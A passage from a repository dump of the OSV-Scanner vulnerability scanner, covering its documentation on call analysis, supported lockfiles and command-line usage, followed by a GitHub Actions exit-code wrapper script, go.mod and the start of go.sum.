is not being executed, these vulnerabilities will be marked as unexecuted. To enable call analysis in all languages, call OSV-Scanner with the `--call-analysis=all` flag. By default, call analysis in Go is enabled, but you can disable it using the `--no-call-analysis=go` flag. ### Call analysis in Go OSV-Scanner uses the [`govulncheck`](https://pkg.go.dev/golang.org/x/vuln/cmd/govulncheck) library to analyze Go source code to identify called vulnerable functions. #### Additional Dependencies `go` compiler needs to be installed and available on `PATH`. ### Call analysis in Rust Experimental {: .label } Call analysis in Rust is still considered experimental. {: .warning } > Running call analysis for Rust will execute build scripts (`build.rs`) in your dependencies as part of the compilation. > This may execute arbitrary code. OSV-Scanner compiles Rust source code and analyzes the output binary's DWARF debug information to identify called vulnerable functions. #### Additional Dependencies Rust toolchain (including `cargo`) that can compile the source code being scanned needs to be installed and available on `PATH`. The installed Rust toolchain must be capable of compiling every crate/target in the scanned code, for code with a lot of dependencies this will take a few minutes. ### Limitations Current implementation has a few limitations: - Does not support dependencies on proc-macros (Tracked in [#464](https://github.com/google/osv-scanner/issues/464)) - Does not support any dependencies that are dynamically linked - Does not support dependencies that link external non-rust code ### Example ```bash osv-scanner scan source --call-analysis=rust --no-call-analysis=go ./my/project/path ``` ================================================ FILE: docs/supported_languages_and_lockfiles.md ================================================ --- layout: page permalink: /supported-languages-and-lockfiles/ nav_order: 2 --- # Supported Artifacts and Manifests {: .no_toc }
Table of contents {: .text-delta } - TOC {:toc}
Artifact and manifest extraction logic is implemented in [OSV-Scalibr](https://github.com/google/osv-scalibr) as a standalone library. OSV-Scanner tightly integrates with OSV-Scalibr to provide an end to end vulnerability scanner for developers. ## Core Concept We split the files we can scan into two broad categories, **artifacts** and **manifests**. We found that when performing different forms of scanning, you are generally interested in different types of files. For example, when scanning your source project, you are much more interested in what your lockfiles and manifests contain, and less interested in what is installed on your development machine, or leftover compiled artifacts. However, if you are scanning a container, then what is installed is the vital piece of information, and lockfiles found on the system no longer matters if the artifacts they point to are not actually downloaded and installed. ## Supported Artifacts When scanning container images (`osv-scanner scan image ...`), OSV-Scanner automatically extracts and analyzes the following artifacts: | Source | Example files | | ------------------------------------ | ---------------------------------- | | Alpine APK packages | `/lib/apk/db/installed` | | Debian/Ubuntu dpkg/apt packages | `/var/lib/dpkg/status` | | | | | Go Binaries | `main-go` | | Rust Binaries (with cargo-auditable) | `main-rust-built-with-auditable` | | Java Uber `jars` | `my-java-app.jar` | | Node Modules | `node-app/node_modules/...` | | Python wheels | `lib/python3.11/site-packages/...` | ## Supported lockfiles/manifests When scanning source code (`osv-scanner scan source ...`), OSV-Scanner automatically extracts and analyzes the following lockfiles/manifests: | Language | Compatible Lockfile(s) | | :--------- | :----------------------------------------------------------------------------------------------------------------------------------------------------- | | C/C++ | `conan.lock`
[C/C++ commit scanning](#cc-scanning) | | Dart | `pubspec.lock` | | Elixir | `mix.lock` | | Go | `go.mod` | | Haskell | `cabal.project.freeze`
`stack.yaml.lock` | | Java | `buildscript-gradle.lockfile`
`gradle.lockfile`
`gradle/verification-metadata.xml`
`pom.xml`[\*](#transitive-dependency-scanning) | | Javascript | `bun.lock`
`package-lock.json`
`pnpm-lock.yaml`
`yarn.lock` | | .NET | `deps.json`
`packages.config`
`packages.lock.json` | | PHP | `composer.lock` | | Python | `Pipfile.lock`
`poetry.lock`
`requirements.txt`[\*](https://github.com/google/osv-scanner/issues/34)
`pdm.lock`
`pylock.toml`
`uv.lock` | | R | `renv.lock` | | Ruby | `Gemfile.lock`
`gems.locked` | | Rust | `Cargo.lock` | ## C/C++ scanning With the addition of [vulnerable commit ranges](https://osv.dev/blog/posts/introducing-broad-c-c++-support/) to the OSV.dev database, OSV-Scanner now supports vendored and submoduled C/C++ dependencies Because the C/C++ ecosystem does not have a centralized package manager, C/C++ dependencies tend to be bundled with the project. Dependencies are either [submoduled](#submoduled-dependencies) or [vendored](#vendored-dependencies). In either case, OSV-Scanner is able to find known vulnerabilities in your project dependencies. OSV-Scanner's C/C++ support is based on commit-level data. OSV's commit-level data covers the majority of C/C++ vulnerabilities within the OSV database, but users should be aware that there may be vulnerabilities in their dependencies that could be excluded from OSV-Scanner results. Adding more commit-level data to the database is an ongoing project. ### Submoduled dependencies Submoduled dependencies are included in the project folder retain their Git histories. To scan a C/C++ project with submoduled dependencies: 1. Navigate to the root folder of your project. 2. Ensure that your submodules are up to date using `git submodule update`. 3. Run scanner using `osv-scanner -r .`. ### Vendored dependencies Vendored dependencies have been directly copied into the project folder, but do not retain their Git histories. OSV-Scanner uses OSV's [determineversion API](https://google.github.io/osv.dev/post-v1-determineversion/) to estimate each dependency's version (and associated Git Commit). Vulnerabilities for the estimated version are returned. This process requires no additional work from the user. Run OSV-Scanner as you normally would. ## Transitive dependency scanning OSV-Scanner supports transitive dependency scanning for Maven pom.xml. This feature is enabled by default when scanning, but it can be disabled using the `--no-resolve` flag. It is also disabled in the [offline mode](./offline-mode.md). OSV-Scanner uses [deps.dev’s resolver library](https://pkg.go.dev/deps.dev/util/resolve) to compute the dependency graph of a project. This graph includes all the direct and transitive dependencies. By default, [deps.dev API](https://docs.deps.dev/api/v3/index.html) is queried for package versions and requirements. Support for querying Maven Central and private registries is also available. After the dependency resolution, the OSV database is queried for the vulnerabilities associated with these dependencies as usual. {: .note } Test dependencies are not supported yet in the computed dependency graph for Maven pom.xml. ### Data source By default, we use the [deps.dev API](https://docs.deps.dev/api/v3/) to find version and dependency information of packages during transitive scanning. If instead you'd like to fetch data from [Maven Central](https://repo.maven.apache.org/maven2/), you can use the `--data-source=native` flag. If your project uses mirrored or private registries, in addition to setting `--data-source=native`, you will need to use the `--maven-registry=` flag to specify the registry (e.g. `--maven-registry=https://repo.maven.apache.org/maven2/`). ## Custom Lockfiles If you have a custom lockfile that we do not support or prefer to do your own custom parsing, you can extract the custom lockfile information and create a custom intermediate file containing dependency information so that osv-scanner can still check for vulnerabilities. Once you extracted your own dependency information, place it in a `osv-scanner.json` file, with the same format as the JSON output of osv-scanner, e.g.: ```jsonc { "results": [ { "packages": [ { "package": { "name": "github.com/repo/url", "commit": "9a6bd55c9d0722cb101fe85a3b22d89e4ff4fe52" } }, { "package": { "name": "react", "version": "1.2.3", "ecosystem": "npm" } } // ... ] } ] } ``` Then pass this to `osv-scanner` with this: ``` osv-scanner --lockfile osv-scanner:/path/to/osv-scanner.json ``` For automatic scan detection, you can create an `osv-scanner-custom.json` file using the same procedure described above for `osv-scanner.json`. Run the command below for detection: ``` ./osv-scanner scan source -r /path/to/folder/you/want/to/scan ``` ### Known limitations When scanning a file in the `osv-scanner.json` format, using the `--format=spdx` flag produces incorrect output. For more details, see issue [#2192](https://github.com/google/osv-scanner/issues/2192). ================================================ FILE: docs/usage.md ================================================ --- layout: page permalink: /usage/ nav_order: 4 --- # Usage {: .note } This documentation is for the V2 release. For the older, V1 release documentation, check out . {: .no_toc }
Table of contents {: .text-delta } - TOC {:toc}
## Core Concept OSV-Scanner operates in a two-step process: 1. **Package Extraction**: The tool first extracts information about the packages used in your project, container image, or other target. 2. **Vulnerability Matching**: The extracted package information is then matched against known vulnerability databases to identify potential security issues. ## Subcommands OSV-Scanner V2 is divided into several subcommands: | Subcommand | Documentation Link | Quick Example | | ------------- | ---------------------------------------------------- | ---------------------------------------------------------------------- | | `scan` | [Further down this page](./usage.md#scan-subcommand) | `osv-scanner scan -r ./my-project-dir/` | | `scan source` | [Source Project Scanning]() | Source scanning is default, so the example is the same as above. | | `scan image` | [Container Scanning](./scan-image.md) | `osv-scanner scan image my-docker-img:latest` | | `fix` | [Guided Remediation](./guided-remediation.md) | `osv-scanner fix -M path/to/package.json -L path/to/package-lock.json` | ### The `scan` Subcommand The `scan` subcommand is the primary way to initiate vulnerability scans. It has two subcommands of its own: `source` (default) and `image`. - **`scan source`**: Scans source code directories for package dependencies and vulnerabilities. See the [Scanning Source documentation](./scan-source.md) for more details. - **`scan image`**: Scans container images for vulnerabilities. See the [Scanning Container Images documentation](./scan-image.md) for more details. Both `scan source` and `scan image` share a common set of flags for configuring the scan and output. ## Post-Extraction Flags ### Saving to File The `--output-file` flag can be used to save the scan results to a file instead of being printed on the stdout: ```bash osv-scanner scan -L package-lock.json --output-file scan-results.txt ``` ### Setting Output Format The `--format` flag can be used to specify the output format osv-scanner gives. See [Output](./output.md) page for more details. ```bash osv-scanner scan -L package-lock.json --format json ``` ### Override config file The `--config` flag can be used to specify a global config override to apply to all the files you are scanning. See [Config](./configuration.md) for more details. ```bash osv-scanner scan -L package-lock.json --config ./my-osv-scanner-config.toml ``` ### Set verbosity level The `--verbosity` flag can be used to set the verbosity level. See `--help` output for possible levels. ```bash osv-scanner scan -L package-lock.json --verbosity info ``` ### Serve HTML report locally The `--serve` flag is a helper flag to set the output format to HTML, and serve the report locally on port 8000. ```bash osv-scanner scan -L package-lock.json --serve ``` ### Offline vulnerability match The `--offline-vulnerabilities` flag can be used to check for vulnerabilities using local databases that are already cached ```bash osv-scanner --offline-vulnerabilities --download-offline-databases ./path/to/your/dir ``` See [offline vulnerabilities](./offline-mode.md) for more details. ### Licenses scanning The `--licenses` flag can be used to report license violations based on an allowlist ```bash # Show license summary only osv-scanner --licenses path/to/repository # Show the license summary and violations against an allowlist (provide the list after the = sign): osv-scanner --licenses="comma-separated list of allowed licenses" path/to/directory ``` See [licenses scanning](./license-scanning.md) for more details. ### Show all packages The `--all-packages` flag can be used to output all packages in JSON format (make sure to set `--format=json`). Note that the `PackageOverrides` configuration, specifically the `ignore` action, takes precedence over this flag. See [configuration](./configuration.md#override-packages) for more details. ```bash osv-scanner --all-packages --format=json path/to/repository ``` ### Other features Several other features are available through flags. See their respective documentation pages for more details: - `--no-resolve`: Disables [transitive dependency resolution](./supported_languages_and_lockfiles.md#transitive-dependency-scanning). ## Pre-Commit Integration OSV-Scanner can be integrated as a [pre-commit](https://pre-commit.com) hook in your project. 1. Add the `osv-scanner` hook to your `.pre-commit-config.yaml` file. 2. Use the `args` key to pass command-line arguments as you would when running OSV-Scanner directly. 3. Verify your configuration with: ```bash pre-commit run --all-files --verbose osv-scanner ``` ### Examples ```yaml # Scan the current directory. repos: - repo: https://github.com/google/osv-scanner/ rev: v2.2.4 hooks: - id: osv-scanner # Scan the current directory, this equivalent as the previous one, but with custom # user defined arguments. The arguments (`args` key) are the defaults. repos: - repo: https://github.com/google/osv-scanner/ rev: v2.2.4 hooks: - id: osv-scanner args: - "scan" - "source" - "--format=vertical" - "--verbosity=error" - "--recursive" - "." # replace with your chosen directory or lock file # Scan a container image. The `docker` command should be present in your PATH. repos: - repo: https://github.com/google/osv-scanner/ rev: v2.2.4 hooks: - id: osv-scanner args: - "scan" - "image" - "--format=vertical" - "--verbosity=error" - "debian:trixie" # replace with your chosen image (the tag is mandatory) ``` ## Running in a Docker Container The OSV-Scanner Docker image can be pulled from the GitHub Container Registry: ```bash docker pull ghcr.io/google/osv-scanner:latest ``` Once you have the image, you can test that it works by running: ```bash docker run ghcr.io/google/osv-scanner -h ``` To run a scan, mount the directory to scan to `/src` and pass the necessary flags: ```bash docker run -v ${PWD}:/src ghcr.io/google/osv-scanner -L /src/go.mod ``` ================================================ FILE: exit_code_redirect.sh ================================================ #!/bin/bash # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # This script works around a limitation of github actions where # actions cannot receive a variable number of arguments in an array # This script takes the last argument and splits it out by new line, # passing it into osv-scanner as separate arguments # Get the total number of arguments total_args=$# # Extract the last argument last_arg="${!total_args}" # Remove the last argument from the list args=${@:1:$((total_args - 1))} # () interprets spaces as separate entries in an array # tr replaces newlines with spaces split_args=($(echo "$last_arg" | tr '\n' ' ')) # Execute osv-scanner with the provided arguments osv-scanner $args "${split_args[@]}" # Store the exit code exit_code=$? echo "Exit code: ${exit_code}" # don't error if there are no lockfiles found if [[ $exit_code -eq 128 ]]; then # if the "--allow-no-lockfiles" flag has not been used, print a deprecation warning using_new_flag="no" for value in "${args[@]}"; do if [[ "$value" = "--allow-no-lockfiles" ]] || [[ "$value" = "-allow-no-lockfiles" ]] || [[ "$value" = "-allow-no-lockfiles=true" ]] || [[ "$value" = "--allow-no-lockfiles=true" ]]; then using_new_flag="yes" fi if [[ "$value" = "-allow-no-lockfiles=false" ]] || [[ "$value" = "--allow-no-lockfiles=false" ]]; then exit $exit_code fi done if [[ $using_new_flag = "no" ]]; then echo "deprecation warning: please use the --allow-no-lockfiles flag if you don't want this action to error when there are no lockfiles" if [[ -n "$CI" ]]; then echo "::warning::No lockfiles found. Please use the --allow-no-lockfiles flag to suppress this warning." fi fi exit_code=0 fi # Exit with the modified exit code exit $exit_code ================================================ FILE: go.mod ================================================ module github.com/google/osv-scanner/v2 go 1.26.1 require ( charm.land/bubbles/v2 v2.0.0 charm.land/bubbletea/v2 v2.0.1 charm.land/glamour/v2 v2.0.0 charm.land/lipgloss/v2 v2.0.1 deps.dev/api/v3 v3.0.0-20260225225317-765e10b45d5b deps.dev/api/v3alpha v0.0.0-20260225225317-765e10b45d5b deps.dev/util/maven v0.0.0-20260225225317-765e10b45d5b deps.dev/util/resolve v0.0.0-20260225225317-765e10b45d5b deps.dev/util/semver v0.0.0-20260225225317-765e10b45d5b github.com/BurntSushi/toml v1.6.0 github.com/CycloneDX/cyclonedx-go v0.10.0 github.com/gkampitakis/go-snaps v0.5.20 github.com/go-git/go-git/v5 v5.17.0 github.com/gobwas/glob v0.2.3 github.com/goccy/go-yaml v1.19.2 github.com/google/go-cmp v0.7.0 github.com/google/osv-scalibr v0.4.6-0.20260318175007-ec4239d68fb9 github.com/ianlancetaylor/demangle v0.0.0-20251118225945-96ee0021ea0f github.com/jedib0t/go-pretty/v6 v6.7.8 github.com/modelcontextprotocol/go-sdk v1.4.1 github.com/muesli/reflow v0.3.0 github.com/opencontainers/go-digest v1.0.0 github.com/ossf/osv-schema/bindings/go v0.0.0-20260304051245-ec3272c283e4 github.com/owenrumney/go-sarif/v3 v3.3.0 github.com/package-url/packageurl-go v0.1.5 github.com/pandatix/go-cvss v0.6.2 github.com/tidwall/gjson v1.18.0 github.com/tidwall/pretty v1.2.1 github.com/tidwall/sjson v1.2.5 github.com/urfave/cli/v3 v3.7.0 go.yaml.in/yaml/v3 v3.0.4 go.yaml.in/yaml/v4 v4.0.0-rc.4 golang.org/x/net v0.51.0 golang.org/x/sync v0.20.0 golang.org/x/term v0.40.0 golang.org/x/vuln v1.1.4 google.golang.org/grpc v1.79.3 google.golang.org/protobuf v1.36.11 gopkg.in/dnaeon/go-vcr.v4 v4.0.6 gopkg.in/ini.v1 v1.67.1 osv.dev/bindings/go v0.0.0-20260306051416-1f963c5a9f4f ) require ( bitbucket.org/creachadair/stringset v0.0.14 // indirect cloud.google.com/go/compute/metadata v0.9.0 // indirect cyphar.com/go-pathrs v0.2.1 // indirect dario.cat/mergo v1.0.2 // indirect deps.dev/util/pypi v0.0.0-20250903005441-604c45d5b44b // indirect github.com/AdaLogics/go-fuzz-headers v0.0.0-20240806141605-e8a1dd7889d6 // indirect github.com/AdamKorcz/go-118-fuzz-build v0.0.0-20250520111509-a70c2aa677fa // indirect github.com/GehirnInc/crypt v0.0.0-20230320061759-8cc1b52080c5 // indirect github.com/Microsoft/go-winio v0.6.2 // indirect github.com/Microsoft/hcsshim v0.13.0 // indirect github.com/ProtonMail/go-crypto v1.3.0 // indirect github.com/aead/serpent v0.0.0-20160714141033-fba169763ea6 // indirect github.com/agext/levenshtein v1.2.3 // indirect github.com/alecthomas/chroma/v2 v2.19.0 // indirect github.com/anchore/go-lzo v0.1.0 // indirect github.com/anchore/go-struct-converter v0.0.0-20250211213226-cce56d595160 // indirect github.com/atotto/clipboard v0.1.4 // indirect github.com/aymerick/douceur v0.2.0 // indirect github.com/bazelbuild/buildtools v0.0.0-20250826111327-4006b543a694 // indirect github.com/cespare/xxhash/v2 v2.3.0 // indirect github.com/charmbracelet/colorprofile v0.4.2 // indirect github.com/charmbracelet/ultraviolet v0.0.0-20260205113103-524a6607adb8 // indirect github.com/charmbracelet/x/ansi v0.11.6 // indirect github.com/charmbracelet/x/exp/slice v0.0.0-20250711012602-b1f986320f7e // indirect github.com/charmbracelet/x/term v0.2.2 // indirect github.com/charmbracelet/x/termios v0.1.1 // indirect github.com/charmbracelet/x/windows v0.2.2 // indirect github.com/clipperhouse/displaywidth v0.11.0 // indirect github.com/clipperhouse/uax29/v2 v2.7.0 // indirect github.com/cloudflare/circl v1.6.3 // indirect github.com/compose-spec/compose-go/v2 v2.8.1 // indirect github.com/containerd/cgroups/v3 v3.0.5 // indirect github.com/containerd/containerd v1.7.29 // indirect github.com/containerd/containerd/api v1.9.0 // indirect github.com/containerd/continuity v0.4.5 // indirect github.com/containerd/errdefs v1.0.0 // indirect github.com/containerd/errdefs/pkg v0.3.0 // indirect github.com/containerd/fifo v1.1.0 // indirect github.com/containerd/log v0.1.0 // indirect github.com/containerd/platforms v1.0.0-rc.1 // indirect github.com/containerd/stargz-snapshotter/estargz v0.16.3 // indirect github.com/containerd/ttrpc v1.2.7 // indirect github.com/containerd/typeurl/v2 v2.2.3 // indirect github.com/cyphar/filepath-securejoin v0.6.0 // indirect github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc // indirect github.com/deitch/magic v0.0.0-20240306090643-c67ab88f10cb // indirect github.com/diskfs/go-diskfs v1.7.0 // indirect github.com/distribution/reference v0.6.0 // indirect github.com/djherbis/times v1.6.0 // indirect github.com/dlclark/regexp2 v1.11.5 // indirect github.com/docker/cli v29.2.0+incompatible // indirect github.com/docker/distribution v2.8.3+incompatible // indirect github.com/docker/docker v28.3.3+incompatible // indirect github.com/docker/docker-credential-helpers v0.9.3 // indirect github.com/docker/go-connections v0.5.0 // indirect github.com/docker/go-events v0.0.0-20250114142523-c867878c5e32 // indirect github.com/docker/go-units v0.5.0 // indirect github.com/dsoprea/go-exfat v0.0.0-20190906070738-5e932fbdb589 // indirect github.com/dsoprea/go-logging v0.0.0-20200710184922-b02d349568dd // indirect github.com/dustin/go-humanize v1.0.1 // indirect github.com/edsrzf/mmap-go v1.2.0 // indirect github.com/elliotwutingfeng/asciiset v0.0.0-20230602022725-51bbb787efab // indirect github.com/emirpasic/gods v1.18.1 // indirect github.com/erikvarga/go-rpmdb v0.0.0-20250523120114-a15a62cd4593 // indirect github.com/felixge/httpsnoop v1.0.4 // indirect github.com/gkampitakis/ciinfo v0.3.2 // indirect github.com/go-errors/errors v1.0.2 // indirect github.com/go-git/gcfg v1.5.1-0.20230307220236-3a3c6141e376 // indirect github.com/go-git/go-billy/v5 v5.8.0 // indirect github.com/go-logr/logr v1.4.3 // indirect github.com/go-logr/stdr v1.2.2 // indirect github.com/go-ole/go-ole v1.2.6 // indirect github.com/go-restruct/restruct v1.2.0-alpha // indirect github.com/go-viper/mapstructure/v2 v2.4.0 // indirect github.com/gogo/protobuf v1.3.2 // indirect github.com/golang/groupcache v0.0.0-20241129210726-2c02b8208cf8 // indirect github.com/google/go-containerregistry v0.20.6 // indirect github.com/google/jsonschema-go v0.4.2 // indirect github.com/google/uuid v1.6.0 // indirect github.com/gorilla/css v1.0.1 // indirect github.com/icholy/digest v1.1.0 // indirect github.com/jbenet/go-context v0.0.0-20150711004518-d14ea06fba99 // indirect github.com/kevinburke/ssh_config v1.2.0 // indirect github.com/klauspost/compress v1.18.0 // indirect github.com/kr/pretty v0.3.1 // indirect github.com/kr/text v0.2.0 // indirect github.com/lucasb-eyer/go-colorful v1.3.0 // indirect github.com/lunixbochs/struc v0.0.0-20200707160740-784aaebc1d40 // indirect github.com/maruel/natural v1.1.1 // indirect github.com/masahiro331/go-ext4-filesystem v0.0.0-20240620024024-ca14e6327bbd // indirect github.com/mattn/go-isatty v0.0.20 // indirect github.com/mattn/go-runewidth v0.0.20 // indirect github.com/mattn/go-shellwords v1.0.12 // indirect github.com/microcosm-cc/bluemonday v1.0.27 // indirect github.com/micromdm/plist v0.2.1 // indirect github.com/mitchellh/go-homedir v1.1.0 // indirect github.com/moby/buildkit v0.23.2 // indirect github.com/moby/docker-image-spec v1.3.1 // indirect github.com/moby/locker v1.0.1 // indirect github.com/moby/sys/mountinfo v0.7.2 // indirect github.com/moby/sys/sequential v0.6.0 // indirect github.com/moby/sys/signal v0.7.1 // indirect github.com/moby/sys/user v0.4.0 // indirect github.com/moby/sys/userns v0.1.0 // indirect github.com/muesli/cancelreader v0.2.2 // indirect github.com/ncruces/go-strftime v0.1.9 // indirect github.com/opencontainers/image-spec v1.1.1 // indirect github.com/opencontainers/runtime-spec v1.2.1 // indirect github.com/opencontainers/selinux v1.13.0 // indirect github.com/pierrec/lz4/v4 v4.1.17 // indirect github.com/pjbgf/sha1cd v0.4.0 // indirect github.com/pkg/errors v0.9.1 // indirect github.com/pkg/xattr v0.4.9 // indirect github.com/planetscale/vtprotobuf v0.6.1-0.20240319094008-0393e58bdf10 // indirect github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec // indirect github.com/rivo/uniseg v0.4.7 // indirect github.com/rogpeppe/go-internal v1.14.1 // indirect github.com/rust-secure-code/go-rustaudit v0.0.0-20250226111315-e20ec32e963c // indirect github.com/saferwall/pe v1.5.7 // indirect github.com/sahilm/fuzzy v0.1.1 // indirect github.com/santhosh-tekuri/jsonschema/v6 v6.0.1 // indirect github.com/secDre4mer/pkcs7 v0.0.0-20240322103146-665324a4461d // indirect github.com/segmentio/asm v1.1.3 // indirect github.com/segmentio/encoding v0.5.4 // indirect github.com/sergi/go-diff v1.4.0 // indirect github.com/shirou/gopsutil v3.21.11+incompatible // indirect github.com/sirupsen/logrus v1.9.4-0.20230606125235-dd1b4c2e81af // indirect github.com/skeema/knownhosts v1.3.1 // indirect github.com/spdx/gordf v0.0.0-20250128162952-000978ccd6fb // indirect github.com/spdx/tools-golang v0.5.5 // indirect github.com/thoas/go-funk v0.9.3 // indirect github.com/tidwall/jsonc v0.3.2 // indirect github.com/tidwall/match v1.1.1 // indirect github.com/tink-crypto/tink-go/v2 v2.4.0 // indirect github.com/tklauser/go-sysconf v0.3.15 // indirect github.com/tklauser/numcpus v0.10.0 // indirect github.com/tonistiigi/go-csvvalue v0.0.0-20240814133006-030d3b2625d0 // indirect github.com/ulikunitz/xz v0.5.15 // indirect github.com/vbatts/tar-split v0.12.1 // indirect github.com/xanzy/ssh-agent v0.3.3 // indirect github.com/xeipuuv/gojsonpointer v0.0.0-20190905194746-02993c407bfb // indirect github.com/xeipuuv/gojsonreference v0.0.0-20180127040603-bd5ef7bd5415 // indirect github.com/xeipuuv/gojsonschema v1.2.0 // indirect github.com/xhit/go-str2duration/v2 v2.1.0 // indirect github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e // indirect github.com/yosida95/uritemplate/v3 v3.0.2 // indirect github.com/yuin/goldmark v1.7.12 // indirect github.com/yuin/goldmark-emoji v1.0.6 // indirect github.com/yusufpapurcu/wmi v1.2.4 // indirect go.etcd.io/bbolt v1.4.2 // indirect go.opencensus.io v0.24.0 // indirect go.opentelemetry.io/auto/sdk v1.2.1 // indirect go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.62.0 // indirect go.opentelemetry.io/otel v1.39.0 // indirect go.opentelemetry.io/otel/metric v1.39.0 // indirect go.opentelemetry.io/otel/trace v1.39.0 // indirect go.uber.org/atomic v1.7.0 // indirect go.uber.org/multierr v1.11.0 // indirect go.uber.org/zap v1.17.0 // indirect go.yaml.in/yaml/v2 v2.4.2 // indirect golang.org/x/crypto v0.48.0 // indirect golang.org/x/exp v0.0.0-20250711185948-6ae5c78190dc // indirect golang.org/x/mod v0.32.0 // indirect golang.org/x/oauth2 v0.34.0 // indirect golang.org/x/sys v0.42.0 // indirect golang.org/x/telemetry v0.0.0-20260109210033-bd525da824e2 // indirect golang.org/x/text v0.34.0 // indirect golang.org/x/tools v0.41.0 // indirect golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da // indirect google.golang.org/genproto v0.0.0-20250707201910-8d1bb00bc6a7 // indirect google.golang.org/genproto/googleapis/api v0.0.0-20260226221140-a57be14db171 // indirect google.golang.org/genproto/googleapis/rpc v0.0.0-20260217215200-42d3e9bedb6d // indirect gopkg.in/warnings.v0 v0.1.2 // indirect gopkg.in/yaml.v3 v3.0.1 // indirect modernc.org/libc v1.66.3 // indirect modernc.org/mathutil v1.7.1 // indirect modernc.org/memory v1.11.0 // indirect modernc.org/sqlite v1.38.0 // indirect sigs.k8s.io/yaml v1.6.0 // indirect www.velocidex.com/golang/go-ntfs v0.2.0 // indirect www.velocidex.com/golang/regparser v0.0.0-20250203141505-31e704a67ef7 // indirect ) ================================================ FILE: go.sum ================================================ bitbucket.org/creachadair/stringset v0.0.14 h1:t1ejQyf8utS4GZV/4fM+1gvYucggZkfhb+tMobDxYOE= bitbucket.org/creachadair/stringset v0.0.14/go.mod h1:Ej8fsr6rQvmeMDf6CCWMWGb14H9mz8kmDgPPTdiVT0w= charm.land/bubbles/v2 v2.0.0 h1:tE3eK/pHjmtrDiRdoC9uGNLgpopOd8fjhEe31B/ai5s= charm.land/bubbles/v2 v2.0.0/go.mod h1:rCHoleP2XhU8um45NTuOWBPNVHxnkXKTiZqcclL/qOI= charm.land/bubbletea/v2 v2.0.1 h1:B8e9zzK7x9JJ+XvHGF4xnYu9Xa0E0y0MyggY6dbaCfQ= charm.land/bubbletea/v2 v2.0.1/go.mod h1:3LRff2U4WIYXy7MTxfbAQ+AdfM3D8Xuvz2wbsOD9OHQ= charm.land/glamour/v2 v2.0.0 h1:IDBoqLEy7Hdpb9VOXN+khLP/XSxtJy1VsHuW/yF87+U= charm.land/glamour/v2 v2.0.0/go.mod h1:kjq9WB0s8vuUYZNYey2jp4Lgd9f4cKdzAw88FZtpj/w= charm.land/lipgloss/v2 v2.0.1 h1:6Xzrn49+Py1Um5q/wZG1gWgER2+7dUyZ9XMEufqPSys= charm.land/lipgloss/v2 v2.0.1/go.mod h1:KjPle2Qd3YmvP1KL5OMHiHysGcNwq6u83MUjYkFvEkM= cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= cloud.google.com/go/compute/metadata v0.9.0 h1:pDUj4QMoPejqq20dK0Pg2N4yG9zIkYGdBtwLoEkH9Zs= cloud.google.com/go/compute/metadata v0.9.0/go.mod h1:E0bWwX5wTnLPedCKqk3pJmVgCBSM6qQI1yTBdEb3C10= cyphar.com/go-pathrs v0.2.1 h1:9nx1vOgwVvX1mNBWDu93+vaceedpbsDqo+XuBGL40b8= cyphar.com/go-pathrs v0.2.1/go.mod h1:y8f1EMG7r+hCuFf/rXsKqMJrJAUoADZGNh5/vZPKcGc= dario.cat/mergo v1.0.2 h1:85+piFYR1tMbRrLcDwR18y4UKJ3aH1Tbzi24VRW1TK8= dario.cat/mergo v1.0.2/go.mod h1:E/hbnu0NxMFBjpMIE34DRGLWqDy0g5FuKDhCb31ngxA= deps.dev/api/v3 v3.0.0-20260225225317-765e10b45d5b h1:NfcHjM/zoNS7fQsEkpms4iDeDeDN0epSc85v9E8URHA= deps.dev/api/v3 v3.0.0-20260225225317-765e10b45d5b/go.mod h1:+gN+ydvfcDk/mTxWon7Ze4X8gYN/HZxUdt54XWgWcRQ= deps.dev/api/v3alpha v0.0.0-20260225225317-765e10b45d5b h1:rLNtxOQmnJ4tBpU1RdZAAF8I5S/VLBEnjxE8qINO9RM= deps.dev/api/v3alpha v0.0.0-20260225225317-765e10b45d5b/go.mod h1:gZ4p6jKUfgFWBPgK32TByXK59A+sDp9plnb7sz7VmxQ= deps.dev/util/maven v0.0.0-20260225225317-765e10b45d5b h1:sfRt80paU8Awo8LlaULg1EovlaVqIi4uO12NaEQhISk= deps.dev/util/maven v0.0.0-20260225225317-765e10b45d5b/go.mod h1:eGrXziwI7scSGrwIj+5EBHtTeSxAZD/yi8Hb3nFXesA= deps.dev/util/pypi v0.0.0-20250903005441-604c45d5b44b h1:67FfxwUt82PEMle2FKlW4DZvzcfSODDoTnSGOT1bYtY= deps.dev/util/pypi v0.0.0-20250903005441-604c45d5b44b/go.mod h1:qmA0z/Lsfa1FMtuLd9JmVZLMHR3GBX/EmbM6z1X3EDU= deps.dev/util/resolve v0.0.0-20260225225317-765e10b45d5b h1:1B0TKabhNud7PlSakdDVtZlLR9S69nfxdSGQJFq44Ao= deps.dev/util/resolve v0.0.0-20260225225317-765e10b45d5b/go.mod h1:u4+2T3Dt2jsbUnWEngaKJYtZuBHN2wSVupHnZcqQvy4= deps.dev/util/semver v0.0.0-20260225225317-765e10b45d5b h1:NAN/jQ0J56JgMqvzt2Ht9i/RQm0GUCi8wHY3TnXt02k= deps.dev/util/semver v0.0.0-20260225225317-765e10b45d5b/go.mod h1:jjJweVqtuMQ7Q4zlTQ/kCHpboojkRvpMYlhy/c93DVU= github.com/AdaLogics/go-fuzz-headers v0.0.0-20240806141605-e8a1dd7889d6 h1:He8afgbRMd7mFxO99hRNu+6tazq8nFF9lIwo9JFroBk= github.com/AdaLogics/go-fuzz-headers v0.0.0-20240806141605-e8a1dd7889d6/go.mod h1:8o94RPi1/7XTJvwPpRSzSUedZrtlirdB3r9Z20bi2f8= github.com/AdamKorcz/go-118-fuzz-build v0.0.0-20250520111509-a70c2aa677fa h1:x6kFzdPgBoLbyoNkA/jny0ENpoEz4wqY8lPTQL2DPkg= github.com/AdamKorcz/go-118-fuzz-build v0.0.0-20250520111509-a70c2aa677fa/go.mod 